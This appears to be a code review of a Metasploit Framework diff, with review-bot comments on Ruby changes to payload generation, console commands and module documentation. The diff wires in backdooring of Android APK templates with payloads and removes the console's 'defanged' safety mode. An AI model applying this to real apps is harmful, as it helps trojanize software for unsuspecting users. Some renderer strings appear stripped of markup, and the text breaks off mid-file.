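Review bot: `run_cmd` passes one interpolated string to `Open3.popen3`, so every apktool and jarsigner call built from `tempdir` goes through the shell, and a temp path containing spaces or shell metacharacters is split or interpreted; the argv form avoids that. Calling `popen3` without a block also never closes the three pipes or reaps the child, and reading stdout to EOF before stderr can stall when the tool fills the stderr pipe first; `Open3.capture2e` covers both. The jarsigner call relies on the shell expanding `~`, so it needs `File.expand_path` once no shell is involved. Separately, `backdoor_payload` removes `tempdir` only on the success path, so any of the raises leaves the working files on disk; the block form `Dir.mktmpdir do |tempdir|` cleans up in every case.

```ruby
def run_cmd(*cmd)
  # argv form: no shell is involved, each element reaches the tool as one argument
  output, _status = Open3.capture2e(*cmd)
  output
rescue Errno::ENOENT
  nil
end

# ... unchanged: find_launcher_activity, fix_manifest, tool version checks ...

run_cmd('apktool', 'd', "#{tempdir}/original.apk", '-o', "#{tempdir}/original")
```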
+++ b/lib/msf/core/payload/windows/prepend_migrate.rb @@ -28,7 +28,7 @@ module Msf::Payload::Windows::PrependMigrate # for discussion. # def prepend_migrate? - !!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true') + datastore['PrependMigrate'] end # diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index b4c436e561..2879093ba7 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -1,4 +1,5 @@ # -*- coding: binary -*- +require 'msf/core/payload/apk' require 'active_support/core_ext/numeric/bytes' module Msf @@ -305,9 +306,15 @@ module Msf # @return [String] A string containing the bytes of the payload in the format selected def generate_payload if platform == "java" or arch == "java" or payload.start_with? "java/" - p = generate_java_payload - cli_print "Payload size: #{p.length} bytes" - p + raw_payload = generate_java_payload + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload + elsif payload.start_with? "android/" and not template.blank? + cli_print "Using APK template: #{template}" + apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new() + raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload) + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload else raw_payload = generate_raw_payload raw_payload = add_shellcode(raw_payload) @@ -369,7 +376,7 @@ module Msf encoders << e if e end encoders.sort_by { |my_encoder| my_encoder.rank }.reverse - elsif badchars.present? + elsif !badchars.empty? && !badchars.nil? framework.encoders.each_module_ranked('Arch' => [arch], 'Platform' => platform_list) do |name, mod| e = framework.encoders.create(name) e.datastore.import_options_from_hash(datastore) diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index d851b1f501..ef80fadf3c 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb 
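Review bot: `prepend_migrate?` now returns the raw datastore entry, so the predicate is only correct if the datastore has already normalised the OptBool value to true or false; a String such as 'false' is truthy in Ruby. That normalisation is not visible in this hunk. I would state the dependency in a comment, `# Relies on the datastore normalising OptBool values to true/false on assignment`, and return a strict boolean with `!!datastore['PrependMigrate']`.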
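Review bot: In the `payload_generator.rb` hunk the new condition `elsif !badchars.empty? && !badchars.nil?` tests for nil after calling `empty?`, so the nil check can never protect the call; a nil `badchars` raises NoMethodError on the first operand. Swapping the operands fixes it: `elsif !badchars.nil? && !badchars.empty?`. The enclosing method starts outside the hunk, so whether `badchars` can be nil at this point is not visible here.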
@@ -1,5 +1,7 @@ # -*- coding: binary -*- +require 'msf/util/document_generator' + module Msf module RPC class RPC_Module < RPC_Base @@ -70,6 +72,17 @@ class RPC_Module < RPC_Base end + # Returns detailed information about a module in HTML. + # + # @return [String] HTML file. + # @example Here's how you would use this from the client: + # rpc.call('module.info_html', 'exploit', 'windows/smb/ms08_067_netapi') + def rpc_info_html(mtype, mname) + m = _find_module(mtype, mname) + Msf::Util::DocumentGenerator.get_module_document(m) + end + + # Returns the metadata for a module. # # @param [String] mtype Module type. Supported types include (case-sensitive): diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb index 0a5506fa03..dc5ef2696d 100644 --- a/lib/msf/sanity.rb +++ b/lib/msf/sanity.rb 
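Review bot: The doc comment for the new `rpc_info_html` documents the return value and an example but neither parameter, unlike the `@param [String] mtype` entry on the method that follows it. I would add `# @param [String] mtype Module type.` and `# @param [String] mname Module name.` What happens when the module is not found depends on `_find_module`, which is outside this hunk, so an `@raise` line should be added once that behaviour is confirmed. The `@return` text says "HTML file" although the method returns whatever `get_module_document` produces, presumably a String of HTML.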
@@ -3,36 +3,6 @@ # Provides some sanity checks against the ruby build and version # -# Check for the broken pack/unpack in OS X 10.4.x -if ([1].pack('n') == "\x01\x00") - $stderr.puts "*** This ruby build has a broken pack/unpack implementation! " - - if (RUBY_PLATFORM =~ /darwin/) - $stderr.puts " Apple shipped a broken version of ruby with the 10.4.x " - $stderr.puts " release. Please install ruby from source, or use one of " - $stderr.puts " the free package managers to obtain a working ruby build." - end - - exit(0) -end - -# Check for ruby 1.8.2 as the minimal supported version -if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/) - $stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+" - exit(0) -end - -# Check for ruby 1.9.0 and throw a big nasty warning -if (RUBY_VERSION =~ /^1\.9\.0/) - $stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer." - exit(0) -end - -# Check for ruby 1.9.1 and throw a warning -if (RUBY_VERSION =~ /^1\.9\.1/) - $stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer." -end - if(RUBY_PLATFORM == 'java') require 'socket' s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP) 
@@ -56,56 +26,3 @@ rescue ::LoadError $stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!" $stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more" end - - -# -# Check for the ugly 1.8.7 short-named constants bug -# - -class ConstBugTestA - Const = 'A' - def test - Const == 'A' - end -end - -ConstBugTestC = ConstBugTestA.dup - -class ConstBugTestB < ConstBugTestC - Const = 'B' -end - -def ruby_187_const_bug - bugged = false - - begin - ConstBugTestA.new.test() - ConstBugTestB.new.test() - rescue ::NameError - bugged = true - end - - bugged -end - -if(ruby_187_const_bug()) - $stderr.puts "" - $stderr.puts "***********************************************************************" - $stderr.puts "*** *" - $stderr.puts "*** This version of the Ruby interpreter contains a serious bug *" - $stderr.puts "*** related to short-named constants, we strongly recommend that you *" - $stderr.puts "*** switch to a fixed version. Unfortunately, some Linux distros have *" - $stderr.puts "*** backported the buggy patch into 1.8.6, so you may need to contact *" - $stderr.puts "*** your vendor and ask them to review the URL below. *" - $stderr.puts "*** *" - $stderr.puts "*** Alternatively, you can download, build, and install the latest *" - $stderr.puts "*** stable snapshot of Ruby from the following URL: *" - $stderr.puts "*** - http://www.ruby-lang.org/ *" - $stderr.puts "*** *" - $stderr.puts "*** For more information, please see the following URL: *" - $stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *" - $stderr.puts "*** *" - $stderr.puts "***********************************************************************" - $stderr.puts "" -end - diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb index c8bcd12e52..0d3155c755 100644 --- a/lib/msf/ui/console/command_dispatcher.rb +++ b/lib/msf/ui/console/command_dispatcher.rb 
@@ -60,12 +60,6 @@ module CommandDispatcher def active_session=(mod) driver.active_session = mod end - # - # Checks to see if the driver is defanged. - # - def defanged? - driver.defanged? - end # # Logs an error message to the screen and the log file. The callstack is diff --git a/lib/msf/ui/console/command_dispatcher/auxiliary.rb b/lib/msf/ui/console/command_dispatcher/auxiliary.rb index b667c6367c..19bf3fb964 100644 --- a/lib/msf/ui/console/command_dispatcher/auxiliary.rb +++ b/lib/msf/ui/console/command_dispatcher/auxiliary.rb @@ -72,8 +72,6 @@ class Auxiliary # Executes an auxiliary module # def cmd_run(*args) - defanged? - opt_str = nil action = mod.datastore['ACTION'] jobify = false diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index a05d06080f..bfcef247c1 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -16,6 +16,7 @@ require 'msf/ui/console/command_dispatcher/nop' require 'msf/ui/console/command_dispatcher/payload' require 'msf/ui/console/command_dispatcher/auxiliary' require 'msf/ui/console/command_dispatcher/post' +require 'msf/util/document_generator' module Msf module Ui 
@@ -34,18 +35,19 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( - "-c" => [ true, "Run a command on the session given with -i, or all"], - "-h" => [ false, "Help banner" ], - "-i" => [ true, "Interact with the supplied session ID" ], - "-l" => [ false, "List all active sessions" ], - "-v" => [ false, "List verbose fields" ], - "-q" => [ false, "Quiet mode" ], - "-k" => [ true, "Terminate sessions by session ID and/or range" ], - "-K" => [ false, "Terminate all sessions" ], - "-s" => [ true, "Run a script on the session given with -i, or all"], - "-r" => [ false, "Reset the ring buffer for the session given with -i, or all"], - "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], - "-t" => [ true, "Set a response timeout (default: 15)"]) + "-c" => [ true, "Run a command on the session given with -i, or all" ], + "-h" => [ false, "Help banner" ], + "-i" => [ true, "Interact with the supplied session ID " ], + "-l" => [ false, "List all active sessions" ], + "-v" => [ false, "List sessions in verbose mode" ], + "-q" => [ false, "Quiet mode" ], + "-k" => [ true, "Terminate sessions by session ID and/or range" ], + "-K" => [ false, "Terminate all sessions" ], + "-s" => [ true, "Run a script on the session given with -i, or all" ], + "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], + "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], + "-t" => [ true, "Set a response timeout (default: 15)" ], + "-x" => [ false, "Show extended information in the session table" ]) @@jobs_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], 
@@ -94,10 +96,6 @@ class Core "-h" => [ false, "Help banner." ], "-e" => [ true, "Expression to evaluate." ]) - # The list of data store elements that cannot be set when in defanged - # mode. - DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ] - # Constant for disclosure date formatting in search functions DISCLOSURE_DATE_FORMAT = "%Y-%m-%d" @@ -223,6 +221,13 @@ class Core end end + if framework.modules.module_load_warnings.length > 0 + print_warning("The following modules were loaded with warnings:") + framework.modules.module_load_warnings.each do |path, error| + print_warning("\t#{path}: #{error}") + end + end + cmd_banner() end @@ -743,7 +748,9 @@ class Core def cmd_info_help print_line "Usage: info [mod2 mod3 ...]" print_line - print_line "Optionally the flag '-j' will print the data in json format" + print_line "Options:" + print_line "* The flag '-j' will print the data in json format" + print_line "* The flag '-d' will show the markdown version with a browser. More info, but could be slow." print_line "Queries the supplied module or modules for information. If no module is given," print_line "show info for the currently active module." print_line @@ -754,15 +761,25 @@ class Core # def cmd_info(*args) dump_json = false + show_doc = false + if args.include?('-j') args.delete('-j') dump_json = true end + if args.include?('-d') + args.delete('-d') + show_doc = true + end + if (args.length == 0) if (active_module) if dump_json print(Serializer::Json.dump_module(active_module) + "\n") + elsif show_doc + print_status("Please wait, generating documentation for #{active_module.shortname}") + Msf::Util::DocumentGenerator.spawn_module_document(active_module) else print(Serializer::ReadableText.dump_module(active_module)) end 
@@ -783,6 +800,9 @@ class Core print_error("Invalid module: #{name}") elsif dump_json print(Serializer::Json.dump_module(mod) + "\n") + elsif show_doc + print_status("Please wait, generating documentation for #{mod.shortname}") + Msf::Util::DocumentGenerator.get_module_document(mod) else print(Serializer::ReadableText.dump_module(mod)) end @@ -808,7 +828,7 @@ class Core end end - args.each { |name| + args.each do |name| mod = framework.modules.create(name) if (mod == nil) @@ -816,7 +836,7 @@ class Core else show_options(mod) end - } + end end # @@ -860,8 +880,6 @@ class Core # Goes into IRB scripting mode # def cmd_irb(*args) - defanged? - expressions = [] # Parse the command options @@ -1210,8 +1228,6 @@ class Core # the framework root plugin directory is used. # def cmd_load(*args) - defanged? - if (args.length == 0) cmd_load_help return false 
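Review bot: In the named-module branch of cmd_info the new `-d` path calls `Msf::Util::DocumentGenerator.get_module_document(mod)` and discards the return value, so `info -d <module>` prints the "Please wait" status and then shows nothing. The active-module branch added in the previous hunk uses `spawn_module_document(active_module)`, which writes the HTML to a temp file and opens it. This branch should do the same: `Msf::Util::DocumentGenerator.spawn_module_document(mod)`. cmd_info starts and ends outside this hunk.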
@@ -1306,65 +1322,57 @@ class Core return false end - arg = args.shift - case arg + action = args.shift + case action when "add", "remove", "del" - if (args.length < 3) - print_error("Missing arguments to route #{arg}.") + subnet = args.shift + subnet,cidr_mask = subnet.split("/") + + if cidr_mask + netmask = Rex::Socket.addr_ctoa(cidr_mask.to_i) + else + netmask = args.shift + end + + gateway_name = args.shift + + if (subnet.nil? || netmask.nil? || gateway_name.nil?) + print_error("Missing arguments to route #{action}.") return false end - # Satisfy check to see that formatting is correct - unless Rex::Socket::RangeWalker.new(args[0]).length == 1 - print_error "Invalid IP Address" - return false - end + gateway = nil - unless Rex::Socket::RangeWalker.new(args[1]).length == 1 - print_error "Invalid Subnet mask" - return false - end - - gw = nil - - # Satisfy case problems - args[2] = "Local" if (args[2] =~ /local/i) - - begin - # If the supplied gateway is a global Comm, use it. - if (Rex::Socket::Comm.const_defined?(args[2])) - gw = Rex::Socket::Comm.const_get(args[2]) - end - rescue NameError - end - - # If we still don't have a gateway, check if it's a session. - if ((gw == nil) and - (session = framework.sessions.get(args[2])) and - (session.kind_of?(Msf::Session::Comm))) - gw = session - elsif (gw == nil) - print_error("Invalid gateway specified.") - return false - end - - if arg == "remove" or arg == "del" - worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gw) - if worked - print_status("Route removed") + case gateway_name + when /local/i + gateway = Rex::Socket::Comm::Local + when /^[0-9]+$/ + session = framework.sessions.get(gateway_name) + if session.kind_of?(Msf::Session::Comm) + gateway = session + elsif session.nil? 
+ print_error("Not a session: #{gateway_name}") + return false else - print_error("Route not found") + print_error("Cannout route through specified session (not a Comm)") + return false end else - worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gw) - if worked - print_status("Route added") - else - print_error("Route already exists") - end + print_error("Invalid gateway") + return false end + msg = "Route " + if action == "remove" or action == "del" + worked = Rex::Socket::SwitchBoard.remove_route(subnet, netmask, gateway) + msg << (worked ? "removed" : "not found") + else + worked = Rex::Socket::SwitchBoard.add_route(subnet, netmask, gateway) + msg << (worked ? "added" : "already exists") + end + print_status(msg) + when "get" if (args.length == 0) print_error("You must supply an IP address.") @@ -1476,8 +1484,6 @@ class Core # restarts of the console. # def cmd_save(*args) - defanged? - # Save the console config driver.save_config @@ -1508,8 +1514,6 @@ class Core # Adds one or more search paths. # def cmd_loadpath(*args) - defanged? - if (args.length == 0 or args.include? "-h") cmd_loadpath_help return true @@ -1757,12 +1761,13 @@ class Core # def cmd_sessions(*args) begin - method = nil - quiet = false - verbose = false - sid = nil - cmds = [] - script = nil + method = nil + quiet = false + show_extended = false + verbose = false + sid = nil + cmds = [] + script = nil reset_ring = false response_timeout = 15 @@ -1779,6 +1784,8 @@ class Core when "-c" method = 'cmd' cmds << val if val + when "-x" + show_extended = true when "-v" verbose = true # Do something with the supplied session identifier instead of @@ -2041,7 +2048,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :show_extended => show_extended, :verbose => verbose)) print_line end 
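Review bot: `subnet = args.shift` is followed directly by `subnet.split("/")`, so `route add` with no further arguments raises NoMethodError on nil before the "Missing arguments" check is reached; the nil check on `subnet` has to come first. The rewrite also drops the two `Rex::Socket::RangeWalker` format checks the old code ran, and `cidr_mask.to_i` turns any non-numeric suffix into 0, so a malformed subnet or mask now reaches `SwitchBoard.add_route` unvalidated (what `addr_ctoa` returns for an out-of-range prefix is not visible here). Two smaller points: `when /local/i` is unanchored and matches any gateway name that merely contains "local", and "Cannout" in the new error message is a typo. The enclosing method starts and ends outside the hunk.

```ruby
subnet = args.shift
if subnet.nil?
  print_error("Missing arguments to route #{action}.")
  return false
end
subnet, cidr_mask = subnet.split("/")

# … unchanged: netmask from cidr_mask or the next argument, gateway_name, nil check …

unless Rex::Socket::RangeWalker.new(subnet).length == 1
  print_error "Invalid IP Address"
  return false
end

unless Rex::Socket::RangeWalker.new(netmask).length == 1
  print_error "Invalid Subnet mask"
  return false
end
```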
@@ -2163,22 +2170,21 @@ class Core @cache_payloads = nil end - # Security check -- make sure the data store element they are setting - # is not prohibited - if global and DefangedProhibitedDataStoreElements.include?(name) - defanged? - end - # If the driver indicates that the value is not valid, bust out. if (driver.on_variable_set(global, name, value) == false) print_error("The value specified for #{name} is not valid.") return true end - if append - datastore[name] = datastore[name] + value - else - datastore[name] = value + begin + if append + datastore[name] = datastore[name] + value + else + datastore[name] = value + end + rescue OptionValidateError => e + print_error(e.message) + elog(e.message) end print_line("#{name} => #{datastore[name]}") @@ -2190,7 +2196,6 @@ class Core # @param str [String] the string currently being typed before tab was hit # @param words [Array] the previously completed words on the command line. words is always # at least 1 when tab completion has reached this stage since the command itself has been completed - def cmd_set_tabs(str, words) # A value has already been specified @@ -2595,9 +2600,9 @@ class Core # Tab completion for the unset command # # @param str [String] the string currently being typed before tab was hit - # @param words [Array] the previously completed words on the command line. words is always - # at least 1 when tab completion has reached this stage since the command itself has been completed - + # @param words [Array] the previously completed words on the command + # line. `words` is always at least 1 when tab completion has reached this + # stage since the command itself has been completed. def cmd_unset_tabs(str, words) datastore = active_module ? active_module.datastore : self.framework.datastore datastore.keys 
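Review bot: When `datastore[name] = value` raises OptionValidateError, the new rescue prints the error and then falls through to `print_line("#{name} => #{datastore[name]}")`, so a rejected value is still followed by a "name => value" line as if the assignment had gone through. Leaving the method from the rescue, e.g. `return true` after `elog(e.message)`, keeps the output unambiguous. The method starts and ends outside this hunk.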
@@ -2834,16 +2839,8 @@ class Core # Returns the revision of the framework and console library # def cmd_version(*args) - svn_console_version = "$Revision: 15168 $" - svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil - if svn_metasploit_version - print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}") - else - print_line("Framework: #{Msf::Framework::Version}") - end - print_line("Console : #{Msf::Framework::Version}.#{svn_console_version.match(/ (.+?) \$/)[1]}") - - return true + print_line("Framework: #{Msf::Framework::Version}") + print_line("Console : #{Msf::Framework::Version}") end def cmd_grep_help @@ -3520,7 +3517,7 @@ class Core next if not o # handle a search string, search deep - if( + if ( not regex or o.name.match(regex) or o.description.match(regex) or @@ -3534,7 +3531,7 @@ class Core mod_opt_keys = o.options.keys.map { |x| x.downcase } opts.each do |opt,val| - if mod_opt_keys.include?(opt.downcase) == false or (val != nil and o.datastore[opt] != val) + if !mod_opt_keys.include?(opt.downcase) || (val != nil && o.datastore[opt] != val) show = false end end diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index f3c36e8463..d2b59bdf5e 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -463,7 +463,7 @@ class Db if search_term next unless ( host.attribute_names.any? { |a| host[a.intern].to_s.match(search_term) } || - !Mdm::Tag.includes(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", framework.db.workspace.id, host.address, search_term.source).order("tags.id DESC").empty? + !Mdm::Tag.includes(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", framework.db.workspace.id, host.address, search_term.source).references(:hosts).order("tags.id DESC").empty? ) end 
@@ -1033,7 +1033,7 @@ class Db ::ActiveRecord::Base.connection_pool.with_connection { query = Metasploit::Credential::Core.where( workspace_id: framework.db.workspace ) - query = query.includes(:private, :public, :logins) + query = query.includes(:private, :public, :logins).references(:private, :public, :logins) query = query.includes(logins: [ :service, { service: :host } ]) if type.present? @@ -1647,6 +1647,7 @@ class Db print_line " Amap Log -m" print_line " Appscan" print_line " Burp Session XML" + print_line " Burp Issue XML" print_line " CI" print_line " Foundstone" print_line " FusionVM XML" diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index ea7be2c617..7d73935782 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -49,8 +49,6 @@ class Exploit # Launches an exploitation attempt. # def cmd_exploit(*args) - defanged? - opt_str = nil payload = mod.datastore['PAYLOAD'] encoder = mod.datastore['ENCODER'] @@ -154,8 +152,7 @@ class Exploit else # If we didn't run a payload handler for this exploit it doesn't # make sense to complain to the user that we didn't get a session - disable_handler = /^true$/i === mod.datastore["DisablePayloadHandler"] ? true : false - unless disable_handler + unless mod.datastore["DisablePayloadHandler"] fail_msg = 'Exploit completed, but no session was created.' print_status(fail_msg) begin diff --git a/lib/msf/ui/console/command_dispatcher/post.rb b/lib/msf/ui/console/command_dispatcher/post.rb index 8ea990a66d..7b64a01098 100644 --- a/lib/msf/ui/console/command_dispatcher/post.rb +++ b/lib/msf/ui/console/command_dispatcher/post.rb @@ -78,8 +78,6 @@ class Post # Executes an auxiliary module # def cmd_run(*args) - defanged? - opt_str = nil jobify = false quiet = false diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index d2292ba6a9..5e2222a168 100644 
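Review bot: In exploit.rb, `unless mod.datastore["DisablePayloadHandler"]` replaces a match against the string "true" with a plain truthiness test. That is only equivalent if the datastore now always hands back a real boolean for this option; the string "false" is truthy in Ruby and would suppress the "no session was created" message. If that normalisation is not guaranteed on every path, keep an explicit comparison such as `unless mod.datastore["DisablePayloadHandler"].to_s =~ /\Atrue\z/i`.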
--- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -139,18 +139,10 @@ class Driver < Msf::Ui::Driver self.disable_output = false # Whether or not command passthru should be allowed - self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true + self.command_passthru = opts.fetch('AllowCommandPassthru', true) # Whether or not to confirm before exiting - self.confirm_exit = (opts['ConfirmExit'] == true) ? true : false - - # Disables "dangerous" functionality of the console - @defanged = opts['Defanged'] == true - - # If we're defanged, then command passthru should be disabled - if @defanged - self.command_passthru = false - end + self.confirm_exit = opts['ConfirmExit'] # Parse any specified database.yml file if framework.db.usable and not opts['SkipDatabaseInit'] @@ -535,6 +527,13 @@ class Driver < Msf::Ui::Driver end end + if framework.modules.module_load_warnings.length > 0 + print_warning("The following modules were loaded with warnings:") + framework.modules.module_load_warnings.each do |path, error| + print_warning("\t#{path}: #{error}") + end + end + framework.events.on_ui_start(Msf::Framework::Revision) if $msf_spinner_thread @@ -563,7 +562,7 @@ class Driver < Msf::Ui::Driver if (framework and framework.payloads.valid?(val) == false) return false - elsif active_module.type == 'exploit' && !active_module.is_payload_compatible?(val) + elsif active_module && active_module.type == 'exploit' && !active_module.is_payload_compatible?(val) return false elsif (active_module) active_module.datastore.clear_non_user_defined @@ -623,17 +622,6 @@ class Driver < Msf::Ui::Driver # attr_accessor :active_resource - # - # If defanged is true, dangerous functionality, such as exploitation, irb, - # and command shell passthru is disabled. In this case, an exception is - # raised. - # - def defanged? - if @defanged - raise DefangedException - end - end - def stop framework.events.on_ui_stop() super 
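Review bot: With `@defanged` removed from the constructor, a caller that still passes `'Defanged' => true` gets neither an error nor a warning: the key is ignored and command passthru stays on by default, where it used to be forced off. Because that option was a safety switch, an embedder relying on it would now run a fully enabled console without noticing. Failing loudly during the transition would make the change visible, e.g. `raise ArgumentError, "Defanged mode is no longer supported" if opts['Defanged']`. Note also that `self.confirm_exit = opts['ConfirmExit']` now stores whatever was passed rather than a strict boolean.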
@@ -652,7 +640,7 @@ protected def unknown_command(method, line) [method, method+".exe"].each do |cmd| - if (command_passthru == true and Rex::FileUtils.find_full_path(cmd)) + if command_passthru && Rex::FileUtils.find_full_path(cmd) print_status("exec: #{line}") print_line('') @@ -762,17 +750,6 @@ protected end end -# -# This exception is used to indicate that functionality is disabled due to -# defanged being true -# -class DefangedException < ::Exception - def to_s - "This functionality is currently disabled (defanged mode)" - end -end - - end end end diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb index 07bcef3693..12fe0fcae2 100644 --- a/lib/msf/ui/console/module_command_dispatcher.rb +++ b/lib/msf/ui/console/module_command_dispatcher.rb @@ -122,8 +122,6 @@ module ModuleCommandDispatcher # Checks to see if a target is vulnerable. # def cmd_check(*args) - defanged? - ip_range_arg = args.shift || mod.datastore['RHOSTS'] || framework.datastore['RHOSTS'] || '' opt = Msf::OptAddressRange.new('RHOSTS') @@ -176,7 +174,7 @@ module ModuleCommandDispatcher def check_simple(instance=nil) unless instance - instance = mod + instance = mod end rhost = instance.datastore['RHOST'] @@ -193,13 +191,13 @@ module ModuleCommandDispatcher 'LocalOutput' => driver.output) if (code and code.kind_of?(Array) and code.length > 1) if (code == Msf::Exploit::CheckCode::Vulnerable) - print_good("#{peer} - #{code[1]}") + print_good("#{code[1]}") report_vuln(instance) else - print_status("#{peer} - #{code[1]}") + print_status("#{code[1]}") end else - msg = "#{peer} - Check failed: The state could not be determined." + msg = "Check failed: The state could not be determined." print_error(msg) elog("#{msg}\n#{caller.join("\n")}") end 
@@ -213,7 +211,7 @@ module ModuleCommandDispatcher print_error("Check failed: #{e.message}") elog("#{e.message}\n#{e.backtrace.join("\n")}") rescue ::Exception => e - print_error("#{peer} - Check failed: #{e.class} #{e}") + print_error("Check failed: #{e.class} #{e}") elog("#{e.message}\n#{e.backtrace.join("\n")}") end end diff --git a/lib/msf/util.rb b/lib/msf/util.rb index 6ce2bdd01e..7439f57d30 100644 --- a/lib/msf/util.rb +++ b/lib/msf/util.rb @@ -21,7 +21,3 @@ end # Executable generation and encoding require 'msf/util/exe' - -# Parse SVN entries -require 'msf/util/svn' - diff --git a/lib/msf/util/document_generator.rb b/lib/msf/util/document_generator.rb new file mode 100644 index 0000000000..cd17faacfc --- /dev/null +++ b/lib/msf/util/document_generator.rb 
@@ -0,0 +1,74 @@ +### +# +# This provides methods to generate documentation for a module. +# +### + +require 'msf/util/document_generator/pull_request_finder' +require 'msf/util/document_generator/normalizer' + +module Msf + module Util + module DocumentGenerator + + + # Spawns a module document with a browser locally. + # + # @param mod [Msf::Module] Module to create document for. + # @return [void] + def self.spawn_module_document(mod) + md = get_module_document(mod) + f = Rex::Quickfile.new(["#{mod.shortname}_doc", '.html']) + f.write(md) + f.close + kb_path = f.path + + Rex::Compat.open_webrtc_browser("file://#{kb_path}") + end + + + # Returns a module document in HTML. + # + # @param mod [Msf::Module] Module to create document for. + # @return [void] + def self.get_module_document(mod) + md = '' + + kb_path = File.join(PullRequestFinder::MANUAL_BASE_PATH, "#{mod.fullname}.md") + kb = '' + + if File.exists?(kb_path) + File.open(kb_path, 'rb') { |f| kb = f.read } + end + + begin + pr_finder = PullRequestFinder.new + pr = pr_finder.search(mod) + rescue PullRequestFinder::Exception => e + pr = e + end + + n = DocumentNormalizer.new + items = { + mod_description: mod.description, + mod_authors: mod.send(:module_info)['Author'], + mod_fullname: mod.fullname, + mod_name: mod.name, + mod_pull_requests: pr, + mod_refs: mod.references, + mod_rank: mod.rank, + mod_platforms: mod.send(:module_info)['Platform'], + mod_options: mod.options, + mod_demo: mod + } + + if mod.respond_to?(:targets) && mod.targets + items[:mod_targets] = mod.targets + end + + n.get_md_content(items, kb) + end + + end + end +end diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb new file mode 100644 index 0000000000..788204b650 --- /dev/null +++ b/lib/msf/util/document_generator/normalizer.rb 
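Review bot: spawn_module_document opens the generated page with `Rex::Compat.open_webrtc_browser`, which (per the compat.rb hunks in this commit) starts Chrome with `--allow-file-access-from-files`. The page is a local `file://` document that embeds pull request titles fetched from GitHub alongside module metadata, so it should not be opened with cross-file read access enabled. `Rex::Compat.open_browser("file://#{kb_path}")` would be the more conservative call, assuming it accepts file URLs. Separately, get_module_document is tagged `@return [void]` but returns the HTML from `n.get_md_content(items, kb)`, so the tag should read `# @return [String] HTML.`; `File.exists?` is the deprecated spelling of `File.exist?`.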
@@ -0,0 +1,288 @@ +require 'redcarpet' +require 'erb' + +module Redcarpet + module Render + class MsfMdHTML < Redcarpet::Render::HTML + + def block_code(code, language) + "
" \
+          "#{code}" \
+        "
" + end + + + def list(content, list_type) + if list_type == :unordered && content.scan(/
  • /).flatten.length > 15 + %Q|

      #{content}

      | + elsif list_type == :unordered + %Q|
        #{content}
      | + elsif list_type == :ordered + %Q|
        #{content}
      | + else + content + end + end + + def header(text, header_level) + %Q|#{text}
      | + end + + def table(header, body) + %Q|#{header}#{body}

